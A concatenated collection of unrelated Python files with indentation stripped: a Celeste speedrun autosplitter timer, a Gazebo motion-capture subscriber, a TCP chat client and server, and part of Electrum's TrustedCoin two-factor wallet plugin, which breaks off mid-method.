subprocess.call(sort_cmd, shell=True)
# Run commands until end of queue
def run(queue):
while True:
cmd = queue.popleft()
if cmd == -1:
return
subprocess.call(cmd, shell=True)
if __name__ == '__main__' : main(sys.argv)
|
celeste_timer.py
|
#!/usr/bin/env python3
import os
import struct
import threading
import time
import collections
import random
# 00 string Level;
# 08 int Chapter;
# 0c int Mode;
# 10 bool TimerActive;
# 11 bool ChapterStarted;
# 12 bool ChapterComplete;
# 18 long ChapterTime;
# 20 int ChapterStrawberries;
# 24 bool ChapterCassette;
# 25 bool ChapterHeart;
# 28 long FileTime;
# 30 int FileStrawberries;
# 34 int FileCassettes;
# 38 int FileHearts;
# 40 int CurrentChapterCheckpoints;
asi_path = os.environ.get('ASI_PATH', '/dev/shm/autosplitterinfo')
def split_time(filetime):
neg = filetime < 0
if neg:
filetime = -filetime
ms = filetime % 1000
se = filetime // 1000 % 60
mi = filetime // 1000 // 60 % 60
hr = filetime // 1000 // 60 // 60
return (neg, hr, mi, se, ms)
def fmt_time(tup, ms_decimals=3, full_width=False, sign=False):
if type(tup) is int:
tup = split_time(tup)
neg, hr, mi, se, ms = tup
if ms_decimals > 0:
if ms_decimals == 1:
ms //= 100
elif ms_decimals == 2:
ms //= 10
ms_str = ('.%%0%dd' % ms_decimals) % ms
else:
ms_str = ''
if hr or mi or full_width:
se_str = '%02d' % se
else:
se_str = '%d' % se
if hr or full_width:
mi_str = '%02d:' % mi
else:
if mi:
mi_str = '%d:' % mi
else:
mi_str = ''
if hr or full_width:
hr_str = '%d:' % hr
else:
hr_str = ''
if sign or neg:
sign_str = '-' if neg else '+'
else:
sign_str = ''
return sign_str + hr_str + mi_str + se_str + ms_str
class AutoSplitterInfo:
def __init__(self, filename=asi_path):
self.all_attrs = ('chapter', 'mode', 'timer_active', 'chapter_started', 'chapter_complete', 'chapter_time', 'chapter_strawberries', 'chapter_cassette', 'chapter_heart', 'file_time', 'file_strawberries', 'file_cassettes', 'file_hearts', 'chapter_checkpoints', 'in_cutscene', 'death_count', "level_name")
self.chapter = 0
self.mode = 0
self.timer_active = False
self.in_cutscene = False
self.death_count = 0
self.level_name = ""
self.chapter_started = False
self.chapter_complete = False
self.chapter_time = 0
self.chapter_strawberries = 0
self.chapter_cassette = False
self.chapter_heart = False
self.chapter_checkpoints = 0
self.file_time = 0
self.file_strawberries = 0
self.file_cassettes = 0
self.file_hearts = 0
if not os.path.exists(filename):
print('waiting for', filename, '...')
while not os.path.exists(filename):
time.sleep(1)
self.fp = open(filename, 'rb')
self.live = True
self.thread = threading.Thread(target=self.update_loop)
self.thread.daemon = True
self.thread.start()
@property
def chapter_name(self):
if self.chapter == 0:
return 'Prologue'
if self.chapter == 8:
return 'Epilogue'
if self.chapter == 10:
return '9'
if self.mode == 0:
side = 'a'
elif self.mode == 1:
side = 'b'
else:
side = 'c'
return '%d%s' % (self.chapter, side)
def __getitem__(self, k):
try:
return getattr(self, k)
except AttributeError as e:
raise KeyError(k) from e
@property
def dict(self):
return {x: getattr(self, x) for x in self.all_attrs}
def update_loop(self):
fmtstring = struct.Struct('Qii???QI??QIIIxxxxI?i100s')
while self.live:
last_tick = time.time()
self.fp.seek(0)
dat = self.fp.raw.read(fmtstring.size)
_, self.chapter, self.mode, self.timer_active, \
self.chapter_started, self.chapter_complete, \
chapter_time, self.chapter_strawberries, \
self.chapter_cassette, self.chapter_heart, file_time, \
self.file_strawberries, self.file_cassettes, self.file_hearts, \
self.chapter_checkpoints, self.in_cutscene, self.death_count, level_name \
= fmtstring.unpack(dat)
self.chapter_time = chapter_time // 10000
self.file_time = file_time // 10000
self.level_name = level_name.split(b'\0')[0].decode()
timeout = last_tick + 0.001 - time.time()
if timeout > 0:
time.sleep(timeout)
class Trigger:
def __init__(self, name, end_trigger):
self.name = name
self.end_trigger = end_trigger
def check_trigger(self, asi): # pylint: disable=unused-argument
return eval(self.end_trigger) # pylint: disable=eval-used
def __repr__(self):
return '<Trigger %s>' % self.name
class Split:
def __init__(self, names, level=0):
if type(names) == str:
names = [names]
if len(names) == 0:
raise ValueError("Need at least one name")
self.names = names
self.level = level
self.identity = random.randrange(2**64)
def level_name(self, level):
if level < self.level:
raise ValueError("Why are you trying to render %s at level %d?" % (self, level))
try:
return self.names[level - self.level]
except IndexError:
return self.names[-1]
def __eq__(self, other):
return hasattr(other, 'identity') and self.identity == other.identity
def __hash__(self):
return hash(self.identity)
def __repr__(self):
return '<Split %s>' % self.names[0]
def __getstate__(self):
return self.__dict__
def __setstate__(self, state):
# migration
if 'name' in state:
state['names'] = [state.pop('name')]
self.__dict__.update(state)
class StartTimer:
def __repr__(self):
return '<StartTimer>'
notpassed = object()
class SplitsRecord(collections.OrderedDict):
def segment_time(self, split, level=0, fallback=notpassed):
found_prev = None
for cur in self:
if cur == split:
break
if cur.level <= level:
found_prev = cur
else:
if fallback is not notpassed:
return fallback
raise KeyError(split)
if found_prev is None:
return self[split]
elif self[split] is None or self[found_prev] is None:
return None
else:
return self[split] - self[found_prev]
class Route(collections.UserList):
def __init__(self, name, time_field, pieces, level_names, reset_trigger):
if type(pieces[-1]) is not Split or pieces[-1].level != 0:
raise TypeError("Last piece of route must be top-level Split")
super().__init__(pieces)
self.name = name
self.time_field = time_field
self.levels = max(piece.level for piece in pieces if type(piece) is Split) + 1
self.splits = [x for x in self if type(x) is Split]
self.level_names = level_names
self.reset_trigger = reset_trigger
def __getstate__(self):
return (list(self), self.name, self.time_field, self.level_names, self.reset_trigger)
def __setstate__(self, state):
if type(state) is dict:
self.__dict__.update(state)
elif len(state) == 3:
self.__init__(state[1], state[2], state[0], ['Segment', 'Subsegment'], None)
else:
self.__init__(state[1], state[2], state[0], state[3], state[4])
def split_idx(self, i, level=0):
while type(self[i]) is not Split or self[i].level > level:
i += 1
if i >= len(self):
return None
return self.splits.index(self[i])
@property
def all_subsegments(self):
prev = None
for split in self.splits:
if prev is not None:
for level in range(prev.level, split.level, -1):
yield (split, level)
yield (split, split.level)
prev = split
class SplitsManager:
def __init__(self, asi, route, compare_pb=None, compare_best=None):
self.asi = asi
self.route = route
self.compare_pb = compare_pb if compare_pb is not None else SplitsRecord()
self.compare_best = compare_best if compare_best is not None else {}
self.current_times = SplitsRecord()
self.current_piece_idx = 0
self.start_time = 0
self.started = False
# migration
parents = {}
for split in self.route.splits:
parents[split.level] = split
if split not in self.compare_pb:
self.compare_pb[split] = None
else:
self.compare_pb.move_to_end(split)
for level in range(split.level, self.route.levels):
key = (split, level)
if key not in self.compare_best:
self.compare_best[key] = None
@property
def done(self):
return self.current_piece_idx >= len(self.route)
@property
def current_piece(self):
if self.done:
return None
return self.route[self.current_piece_idx]
def _current_split_idx(self, level=0):
idx = self.route.split_idx(self.current_piece_idx, level)
if idx is None:
return None
while self.route.splits[idx].level > level:
idx += 1
return idx
def _forward_split(self, idx, level=0):
idx += 1
if idx >= len(self.route.splits):
return None
while self.route.splits[idx].level > level:
idx += 1
if idx >= len(self.route.splits):
return None
return idx
def _backwards_split(self, idx, level=0):
idx -= 1
if idx < 0:
return None
while self.route.splits[idx].level > level:
idx -= 1
if idx < 0:
return None
return idx
def current_split(self, level=0):
if self.done:
return None
idx = self._current_split_idx(level)
return self.route.splits[idx]
def previous_split(self, level=0):
idx = self._current_split_idx(level)
idx = self._backwards_split(idx, level)
if idx is None:
return None
return self.route.splits[idx]
def is_segment_done(self, split):
return self.current_piece_idx > self.route.index(split)
@property
def current_time(self):
return self.asi[self.route.time_field] - self.start_time
def current_segment_time(self, level=0):
if self.done:
return None
prev_split = self.previous_split(level)
if prev_split is None:
return self.current_time
split_start = self.current_times[prev_split]
if split_start is None:
return None
return self.current_time - split_start
def best_possible_time(self):
return None
def split(self, split):
self.current_times[split] = self.current_time
def commit(self):
if self.route.splits[-1] in self.current_times:
cur_time = self.current_times[self.route.splits[-1]]
pb_time = self.compare_pb[self.route.splits[-1]]
if pb_time is None or cur_time < pb_time:
self.compare_pb = self.current_times
# TODO: do we care about not mutating this reference?
self.compare_best = dict(self.compare_best)
for key in self.route.all_subsegments:
split, level = key
seg = self.current_times.segment_time(split, level, None)
best = self.compare_best[key]
if seg is not None and (best is None or seg < best):
self.compare_best[key] = seg
def reset(self):
self.current_piece_idx = 0
self.current_times = SplitsRecord()
self.started = False
self.start_time = 0
def skip(self, n=1):
while not self.done:
if type(self.current_piece) is Split:
self.current_times[self.current_piece] = None
self.current_piece_idx += 1
elif type(self.current_piece) is StartTimer:
self.start_time = self.asi[self.route.time_field]
self.current_piece_idx += 1
else:
if n:
self.started = True
self.current_piece_idx += 1
n -= 1
else:
break
def rewind(self, n=1):
while self.current_piece_idx:
if type(self.current_piece) is Split:
del self.current_times[self.current_piece]
self.current_piece_idx -= 1
elif type(self.current_piece) is StartTimer:
self.current_piece_idx -= 1
self.started = False
else:
if n:
self.current_piece_idx -= 1
n -= 1
else:
if self.current_piece.check_trigger(self.asi):
self.current_piece_idx -= 1
else:
break
def update(self):
if type(self.route.reset_trigger) is Trigger and self.route.reset_trigger.check_trigger(self.asi):
self.commit()
self.reset()
if self.done:
return
while not self.done:
if type(self.current_piece) is Split:
self.split(self.current_piece)
self.current_piece_idx += 1
elif type(self.current_piece) is StartTimer:
self.start_time = self.asi[self.route.time_field]
self.current_piece_idx += 1
else:
if self.current_piece.check_trigger(self.asi):
self.started = True
self.current_piece_idx += 1
else:
break
def parse_mapname(line):
if line.lower() == 'farewell':
return 10, 0
if line.lower() == 'prologue':
return 0, 0
if line.isdigit():
side = 'a'
else:
line, side = line[:-1], line[-1]
side = side.lower()
assert side in ('a', 'b', 'c')
mode = ord(side) - ord('a')
chapter = int(line)
if chapter >= 8:
chapter += 1
return chapter, mode
def _main():
asi = AutoSplitterInfo()
max_width = max(len(attr) for attr in asi.all_attrs)
while True:
data = '\x1b\x5b\x48\x1b\x5b\x4a'
time.sleep(0.01)
for attr in asi.all_attrs:
val = asi.dict[attr]
if attr.endswith('_time'):
val = fmt_time(val)
data += attr.ljust(max_width) + ': ' + str(val) + '\n'
print(data)
if __name__ == '__main__':
_main()
|
__init__.py
|
from threading import Thread
import trollius
from trollius import From
import pygazebo
from pygazebo.msg import poses_stamped_pb2
from pyquaternion import Quaternion
from math import pi
loop = trollius.get_event_loop()
EXIT = False
def exit():
EXIT = True
loop.stop()
print("exiting... motion captrue")
def parse_data(data):
message = poses_stamped_pb2.PosesStamped.FromString(data)
position = message.pose[0].position
position = (position.y, position.x, position.z)
orientation = message.pose[0].orientation
q = Quaternion(orientation.w, orientation.x, orientation.y * -1.0, orientation.z * -1.0)
convert_q = tuple(q*Quaternion(axis=[0, 0, 1], radians=pi * 0.5))
callback(1, position, convert_q)
@trollius.coroutine
def subscribe_loop(address):
manager = yield From(pygazebo.connect(address=address))
manager.subscribe('/gazebo/default/pose/info',
'gazebo.msgs.PosesStamped',
parse_data)
while not EXIT:
yield From(trollius.sleep(0.2))
def loop_in_thread(loop, address):
try:
trollius.set_event_loop(loop)
loop.run_until_complete(subscribe_loop(address))
except Exception as e:
print(e)
def create_motion_capture(address):
motion_capture = Thread(target=loop_in_thread, args=(loop, address,))
motion_capture.exit = exit
return motion_capture
class PositionEstimate(object):
def __init__(self):
self.positions_buffer = []
self.delay = 0.05
self.init = False
self.first_position = []
self.estimated_position = []
def is_ready(self):
return len(self.estimated_position) > 0
def receive_new_position(self, x, y, z):
new_position = [x, y, z]
if not self.init:
self.first_position = new_position[:]
self.init = True
self.positions_buffer.append(new_position)
if len(self.positions_buffer) > 1:
self.positions_buffer = self.positions_buffer[-2:]
position = []
for i in range(3):
position.append((self.positions_buffer[-1][i] - self.positions_buffer[-2][i])*self.delay + self.positions_buffer[-1][i])
self.estimated_position = position
@property
def ned_position(self):
x, y, z = self.estimated_position
x0, y0, z0 = self.first_position
return x - x0, y - y0, z0 - z
if __name__ == '__main__':
def callback(id, position, orientation):
print(id, position, orientation)
motion_capture = create_motion_capture(('127.0.0.1', 11345), callback)
motion_capture.start()
import time
time.sleep(5)
motion_capture.exit()
|
client-chat.py
|
import socket
import sys
import argparse
import threading
address = "127.0.0.1"
port = 4444
username = "Me"
servername = "Received"
def recv_data(s):
while True:
try:
data=s.recv(1024)
print(f"\n{servername}: {data.decode()}\n{username}: ", end="")
except ConnectionResetError:
if servername!="Received":
print(f"\nClosed by {servername}")
else:
print("\nClosed by other user.")
break
except ConnectionAbortedError:
print(f"\nConnection closed by {username.lower()}.")
break
s.close()
print("Program Exited")
sys.exit()
if __name__=="__main__":
parser = argparse.ArgumentParser(description="Simple Chat Client Program.")
parser.add_argument("-i", "--ipaddress", help="IP address of target server (Default: 127.0.0.1)")
parser.add_argument("-p", "--port", help="Listening port number of target server (Default: 4444)")
parser.add_argument("-u", "--username", help="The name used during connection")
args = parser.parse_args()
if args.ipaddress:
address=args.ipaddress
if args.port:
port=int(args.port)
if args.username:
username=args.username
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((address, port))
print("\nConnected Server IP: " + address)
print("Connected Server port: " + str(port))
print()
servername=s.recv(1024)
servername=servername.decode()
if servername=="Me":
servername="Received"
s.send(bytes(username, encoding="UTF-8"))
recv_ = threading.Thread(target=recv_data, args=(s,))
recv_.start()
while True:
try:
print(f"{username}: ",end="")
to_send=input()
s.send(bytes(to_send, encoding="UTF-8"))
except KeyboardInterrupt:
print("\nProgam Exited.")
s.close()
sys.exit()
except KeyboardInterrupt:
print("\nProgam Exited.")
s.close()
sys.exit()
finally:
s.close()
|
server.py
|
#!/usr/bin/python
'''
Andrei Dorin
06/10/2018
Server interface for WISP server implementation
'''
import argparse
import logging
import sys
import signal
import socket as so
import threading
import wisp_common as wcom
from wisp_common import WispRequest
from wisp_server import WispServer
# Database for user accounts, resets on server shutdown
DATASTORE = {
'andrei': {
'password': 'dorin',
'friends': ['safa', 'cameron', 'kenny', 'colbert']
},
'cameron': {
'password': 'graybill',
'friends': ['andrei']
},
'safa': {
'password': 'aman',
'friends': ['andrei']
},
'michael': {
'password': 'kain',
'friends': []
},
'kenny': {
'password': 'li',
'friends': ['andrei']
},
'colbert': {
'password': 'zhu',
'friends': ['andrei']
}
}
class Server():
'''
Main Server class
Handles UDP service discovery
Accepts TCP connections and delegates to WISP sessions
Provides callbacks for all commands
'''
def __init__(self):
self._logger = logging.getLogger(__name__)
self._socket = None
self._data_lock = threading.Lock()
self._sessions = []
self._sess_lock = threading.Lock()
self._handlers = {
WispRequest.AUTH: self._handle_auth,
WispRequest.LIST: self._handle_list,
WispRequest.SEARCH: self._handle_search,
WispRequest.ADD: self._handle_add,
WispRequest.DEL: self._handle_del,
WispRequest.CONV: self._handle_conv,
}
def start(self, addr, port):
'''Start UDP service discovery and TCP socket accepts'''
self._logger.info(f'Starting service descovery on broadcast:{wcom.WISP_DEFAULT_PORT}')
threading.Thread(target=self.service_descovery, args=(wcom.WISP_DEFAULT_PORT,), daemon=True).start()
self._setup_tcp_sock(addr, port)
# CONCURRENT
while True:
conn, addr = self._socket.accept()
self._logger.info(f'New connection from {addr}')
# Create new wisp session on a different thread for every client
# Since WispServer inherits from Thread, start() calls the run()
# Function defined in wisp_server.py
server = WispServer(conn, self._handlers, self._handle_message)
server.start()
# Save session for later
with self._sess_lock:
self._sessions.append(server)
@classmethod
def service_descovery(cls, port):
'''Service descovery system, meant to run as a separate thread'''
# Getting local IP
temp = so.socket(so.AF_INET, so.SOCK_DGRAM)
temp.connect(('8.8.8.8', port))
addr = temp.getsockname()[0]
temp.close()
while True:
udp = so.socket(so.AF_INET, so.SOCK_DGRAM)
udp.setsockopt(so.SOL_SOCKET, so.SO_REUSEADDR, 1)
udp.setsockopt(so.SOL_SOCKET, so.SO_BROADCAST, 1)
udp.bind(('', port))
data = udp.recv(len(wcom.WISP_ARP_REQ))
if data == wcom.WISP_ARP_REQ:
udp.sendto(wcom.WISP_ARP_RES + addr.encode(), ('255.255.255.255', port))
def _setup_tcp_sock(self, addr, port):
'''TCP socket init'''
self._logger.info(f'Starting TCP socket on {addr}:{port}')
self._socket = so.socket(so.AF_INET, so.SOCK_STREAM)
self._socket.setsockopt(so.SOL_SOCKET, so.SO_REUSEADDR, 1)
self._socket.bind((addr, port))
self._socket.listen(wcom.WISP_DEFAULT_CONNECTION_COUNT)
# ----- Handlers for all commands -----
def _handle_auth(self, username, password):
'''Verifies username and password againsts database'''
with self._data_lock:
if username in DATASTORE:
if DATASTORE[username]['password'] == password:
return True, []
return False, ['Invalid Cred']
def _handle_list(self, username):
'''Returns friends list'''
with self._data_lock:
if username not in DATASTORE:
return False, ['Invalid user']
return True, DATASTORE[username]['friends']
def _handle_search(self, owner, lookup):
'''Searches database for users matching "lookup"'''
user_list = []
with self._data_lock:
for user in DATASTORE:
if user != owner and lookup in user and user not in DATASTORE[owner]['friends']:
user_list.append(user)
return True, user_list
def _handle_add(self, owner, user):
'''Adds new friend to friend list to both users'''
with self._data_lock:
if owner not in DATASTORE or user not in DATASTORE:
return False, ['Invalid User']
DATASTORE[owner]['friends'].append(user)
DATASTORE[user]['friends'].append(owner)
return True, []
def _handle_del(self, owner, user):
'''Deletes friend from both users lists'''
with self._data_lock:
if owner not in DATASTORE or user not in DATASTORE[owner]['friends']:
return False, ['Invalid Users']
DATASTORE[owner]['friends'].remove(user)
DATASTORE[user]['friends'].remove(owner)
return True, []
def _handle_conv(self, owner, target):
'''Validates user is online for conversation'''
with self._data_lock:
if target not in DATASTORE[owner]['friends']:
return False, ['Friend Unknown']
with self._sess_lock:
for conn in self._sessions:
if conn.user == target:
return True, []
return False, ['User offline']
def _handle_message(self, receiver, msg):
'''
Route message to destination session
Also cleans up dead sessions
'''
with self._sess_lock:
for i in range(len(self._sessions) -1, -1, -1):
connection = self._sessions[i]
if not connection.is_alive():
del self._sessions[i]
continue
if connection.user == receiver and connection.check_msg_state():
self._logger.debug(f'Routing message to {receiver}: {msg}')
connection.msgq.put(msg)
def signal_sigint(_, __):
'''
Signal handler for KeyboardInterrupt or SIGINT
'''
print('SIGINT Received, shutting down')
sys.exit(0)
def main():
'''
Main entry point of server
Argument parsing and initializing client
'''
parser = argparse.ArgumentParser(description='WISP chat server')
parser.add_argument('-v', '--verbosity', type=int, default=4, choices=[4, 3, 2, 1],
help='Verbosity of logger, 4: Error, 3: Warning, 2: Info, 1: Debug')
args = parser.parse_args()
logging.basicConfig()
logging.getLogger().setLevel(args.verbosity * 10)
signal.signal(signal.SIGINT, signal_sigint)
# SERVICE
server = Server()
server.start(wcom.WISP_DEFAULT_HOST, wcom.WISP_DEFAULT_PORT)
if __name__ == '__main__':
main()
|
trustedcoin.py
|
#!/usr/bin/env python
#
# Electrum - Lightweight Bitcoin Client
# Copyright (C) 2015 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import asyncio
import socket
import json
import base64
import time
import hashlib
from collections import defaultdict
from typing import Dict, Union, Sequence, List
from urllib.parse import urljoin
from urllib.parse import quote
from aiohttp import ClientResponse
from electrum import ecc, constants, keystore, version, bip32, bitcoin
from electrum.bip32 import BIP32Node, xpub_type
from electrum.crypto import sha256
from electrum.transaction import PartialTxOutput, PartialTxInput, PartialTransaction, Transaction
from electrum.mnemonic import Mnemonic, seed_type, is_any_2fa_seed_type
from electrum.wallet import Multisig_Wallet, Deterministic_Wallet
from electrum.i18n import _
from electrum.plugin import BasePlugin, hook
from electrum.util import NotEnoughFunds, UserFacingException
from electrum.storage import StorageEncryptionVersion
from electrum.network import Network
from electrum.base_wizard import BaseWizard, WizardWalletPasswordSetting
from electrum.logging import Logger
def get_signing_xpub(xtype):
if not constants.net.TESTNET:
xpub = "xpub661MyMwAqRbcGnMkaTx2594P9EDuiEqMq25PM2aeG6UmwzaohgA6uDmNsvSUV8ubqwA3Wpste1hg69XHgjUuCD5HLcEp2QPzyV1HMrPppsL"
else:
xpub = "tpubD6NzVbkrYhZ4XdmyJQcCPjQfg6RXVUzGFhPjZ7uvRC8JLcS7Hw1i7UTpyhp9grHpak4TyK2hzBJrujDVLXQ6qB5tNpVx9rC6ixijUXadnmY"
if xtype not in ('standard', 'p2wsh'):
raise NotImplementedError('xtype: {}'.format(xtype))
if xtype == 'standard':
return xpub
node = BIP32Node.from_xkey(xpub)
return node._replace(xtype=xtype).to_xpub()
def get_billing_xpub():
if constants.net.TESTNET:
return "tpubD6NzVbkrYhZ4X11EJFTJujsYbUmVASAYY7gXsEt4sL97AMBdypiH1E9ZVTpdXXEy3Kj9Eqd1UkxdGtvDt5z23DKsh6211CfNJo8bLLyem5r"
else:
return "xpub6DTBdtBB8qUmH5c77v8qVGVoYk7WjJNpGvutqjLasNG1mbux6KsojaLrYf2sRhXAVU4NaFuHhbD9SvVPRt1MB1MaMooRuhHcAZH1yhQ1qDU"
DISCLAIMER = [
_("Two-factor authentication is a service provided by TrustedCoin. "
"It uses a multi-signature wallet, where you own 2 of 3 keys. "
"The third key is stored on a remote server that signs transactions on "
"your behalf. To use this service, you will need a smartphone with "
"Google Authenticator installed."),
_("A small fee will be charged on each transaction that uses the "
"remote server. You may check and modify your billing preferences "
"once the installation is complete."),
_("Note that your coins are not locked in this service. You may withdraw "
"your funds at any time and at no cost, without the remote server, by "
"using the 'restore wallet' option with your wallet seed."),
_("The next step will generate the seed of your wallet. This seed will "
"NOT be saved in your computer, and it must be stored on paper. "
"To be safe from malware, you may want to do this on an offline "
"computer, and move your wallet later to an online computer."),
]
KIVY_DISCLAIMER = [
_("Two-factor authentication is a service provided by TrustedCoin. "
"To use it, you must have a separate device with Google Authenticator."),
_("This service uses a multi-signature wallet, where you own 2 of 3 keys. "
"The third key is stored on a remote server that signs transactions on "
"your behalf. A small fee will be charged on each transaction that uses the "
"remote server."),
_("Note that your coins are not locked in this service. You may withdraw "
"your funds at any time and at no cost, without the remote server, by "
"using the 'restore wallet' option with your wallet seed."),
]
RESTORE_MSG = _("Enter the seed for your 2-factor wallet:")
class TrustedCoinException(Exception):
def __init__(self, message, status_code=0):
Exception.__init__(self, message)
self.status_code = status_code
class ErrorConnectingServer(Exception):
def __init__(self, reason: Union[str, Exception] = None):
self.reason = reason
def __str__(self):
header = _("Error connecting to {} server").format('TrustedCoin')
reason = self.reason
if isinstance(reason, BaseException):
reason = repr(reason)
return f"{header}:\n{reason}" if reason else header
class TrustedCoinCosignerClient(Logger):
def __init__(self, user_agent=None, base_url='https://api.trustedcoin.com/2/'):
self.base_url = base_url
self.debug = False
self.user_agent = user_agent
Logger.__init__(self)
async def handle_response(self, resp: ClientResponse):
if resp.status != 200:
try:
r = await resp.json()
message = r['message']
except:
message = await resp.text()
raise TrustedCoinException(message, resp.status)
try:
return await resp.json()
except:
return await resp.text()
def send_request(self, method, relative_url, data=None, *, timeout=None):
network = Network.get_instance()
if not network:
raise ErrorConnectingServer('You are offline.')
url = urljoin(self.base_url, relative_url)
if self.debug:
self.logger.debug(f'<-- {method} {url} {data}')
headers = {}
if self.user_agent:
headers['user-agent'] = self.user_agent
try:
if method == 'get':
response = Network.send_http_on_proxy(method, url,
params=data,
headers=headers,
on_finish=self.handle_response,
timeout=timeout)
elif method == 'post':
response = Network.send_http_on_proxy(method, url,
json=data,
headers=headers,
on_finish=self.handle_response,
timeout=timeout)
else:
assert False
except TrustedCoinException:
raise
except Exception as e:
raise ErrorConnectingServer(e)
else:
if self.debug:
self.logger.debug(f'--> {response}')
return response
def get_terms_of_service(self, billing_plan='electrum-per-tx-otp'):
"""
Returns the TOS for the given billing plan as a plain/text unicode string.
:param billing_plan: the plan to return the terms for
"""
payload = {'billing_plan': billing_plan}
return self.send_request('get', 'tos', payload)
def create(self, xpubkey1, xpubkey2, email, billing_plan='electrum-per-tx-otp'):
"""
Creates a new cosigner resource.
:param xpubkey1: a bip32 extended public key (customarily the hot key)
:param xpubkey2: a bip32 extended public key (customarily the cold key)
:param email: a contact email
:param billing_plan: the billing plan for the cosigner
"""
payload = {
'email': email,
'xpubkey1': xpubkey1,
'xpubkey2': xpubkey2,
'billing_plan': billing_plan,
}
return self.send_request('post', 'cosigner', payload)
def auth(self, id, otp):
"""
Attempt to authenticate for a particular cosigner.
:param id: the id of the cosigner
:param otp: the one time password
"""
payload = {'otp': otp}
return self.send_request('post', 'cosigner/%s/auth' % quote(id), payload)
def get(self, id):
""" Get billing info """
return self.send_request('get', 'cosigner/%s' % quote(id))
def get_challenge(self, id):
""" Get challenge to reset Google Auth secret """
return self.send_request('get', 'cosigner/%s/otp_secret' % quote(id))
def reset_auth(self, id, challenge, signatures):
""" Reset Google Auth secret """
payload = {'challenge':challenge, 'signatures':signatures}
return self.send_request('post', 'cosigner/%s/otp_secret' % quote(id), payload)
def sign(self, id, transaction, otp):
"""
Attempt to authenticate for a particular cosigner.
:param id: the id of the cosigner
:param transaction: the hex encoded [partially signed] compact transaction to sign
:param otp: the one time password
"""
payload = {
'otp': otp,
'transaction': transaction
}
return self.send_request('post', 'cosigner/%s/sign' % quote(id), payload,
timeout=60)
def transfer_credit(self, id, recipient, otp, signature_callback):
"""
Transfer a cosigner's credits to another cosigner.
:param id: the id of the sending cosigner
:param recipient: the id of the recipient cosigner
:param otp: the one time password (of the sender)
:param signature_callback: a callback that signs a text message using xpubkey1/0/0 returning a compact sig
"""
payload = {
'otp': otp,
'recipient': recipient,
'timestamp': int(time.time()),
}
relative_url = 'cosigner/%s/transfer' % quote(id)
full_url = urljoin(self.base_url, relative_url)
headers = {
'x-signature': signature_callback(full_url + '\n' + json.dumps(payload))
}
return self.send_request('post', relative_url, payload, headers)
server = TrustedCoinCosignerClient(user_agent="Electrum/" + version.ELECTRUM_VERSION)
class Wallet_2fa(Multisig_Wallet):
plugin: 'TrustedCoinPlugin'
wallet_type = '2fa'
def __init__(self, db, storage, *, config):
self.m, self.n = 2, 3
Deterministic_Wallet.__init__(self, db, storage, config=config)
self.is_billing = False
self.billing_info = None
self._load_billing_addresses()
def _load_billing_addresses(self):
billing_addresses = {
'legacy': self.db.get('trustedcoin_billing_addresses', {}),
'segwit': self.db.get('trustedcoin_billing_addresses_segwit', {})
}
self._billing_addresses = {} # type: Dict[str, Dict[int, str]] # addr_type -> index -> addr
self._billing_addresses_set = set() # set of addrs
for addr_type, d in list(billing_addresses.items()):
self._billing_addresses[addr_type] = {}
# convert keys from str to int
for index, addr in d.items():
self._billing_addresses[addr_type][int(index)] = addr
self._billing_addresses_set.add(addr)
def can_sign_without_server(self):
return not self.keystores['x2/'].is_watching_only()
def get_user_id(self):
return get_user_id(self.db)
def min_prepay(self):
return min(self.price_per_tx.keys())
def num_prepay(self):
default = self.min_prepay()
n = self.config.get('trustedcoin_prepay', default)
if n not in self.price_per_tx:
n = default
return n
def extra_fee(self):
if self.can_sign_without_server():
return 0
if self.billing_info is None:
self.plugin.start_request_thread(self)
return 0
if self.billing_info.get('tx_remaining'):
return 0
if self.is_billing:
return 0
n = self.num_prepay()
price = int(self.price_per_tx[n])
if price > 100000 * n:
raise Exception('too high trustedcoin fee ({} for {} txns)'.format(price, n))
return price
def make_unsigned_transaction(
self, *,
coins: Sequence[PartialTxInput],
outputs: List[PartialTxOutput],
fee=None,
change_addr: str = None,
is_sweep=False,
rbf=False) -> PartialTransaction:
mk_tx = lambda o: Multisig_Wallet.make_unsigned_transaction(
self, coins=coins, outputs=o, fee=fee, change_addr=change_addr, rbf=rbf)
extra_fee = self.extra_fee() if not is_sweep else 0
if extra_fee:
address = self.billing_info['billing_address_segwit']
fee_output = PartialTxOutput.from_address_and_value(address, extra_fee)
try:
tx = mk_tx(outputs + [fee_output])
except NotEnoughFunds:
# TrustedCoin won't charge if the total inputs is
# lower than their fee
tx = mk_tx(outputs)
if tx.input_value() >= extra_fee:
raise
self.logger.info("not charging for this tx")
else:
tx = mk_tx(outputs)
return tx
def on_otp(self, tx: PartialTransaction, otp):
if not otp:
self.logger.info("sign_transaction: no auth code")
return
otp = int(otp)
long_user_id, short_id = self.get_user_id()
raw_tx = tx.serialize_as_bytes().hex()
assert raw_tx[:10] == "70736274ff", f"bad magic. {raw_tx[:10]}"
try:
r = server.sign(short_id, raw_tx, otp)
except TrustedCoinException as e:
if e.status_code == 400: # invalid OTP
raise UserFacingException(_('Invalid one-time password.')) from e
else:
raise
if r:
received_raw_tx = r.get('transaction')
received_tx = Transaction(received_raw_tx)
tx.combine_with_other_psbt(received_tx)
self.logger.info(f"twofactor: is complete {tx.is_complete()}")
# reset billing_info
self.billing_info = None
self.plugin.start_request_thread(self)
def add_new_billing_address(self, billing_index: int, address: str, addr_type: str):
billing_addresses_of_this_type = self._billing_addresses[addr_type]
saved_addr = billing_addresses_of_this_type.get(billing_index)
if saved_addr is not None:
if saved_addr == address:
return # already saved this address
else:
raise Exception('trustedcoin billing address inconsistency.. '
'for index {}, already saved {}, now got {}'
.format(billing_index, saved_addr, address))
